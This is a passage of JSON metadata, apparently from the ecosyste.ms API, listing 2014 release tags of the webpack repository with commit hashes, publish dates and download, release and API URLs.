//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a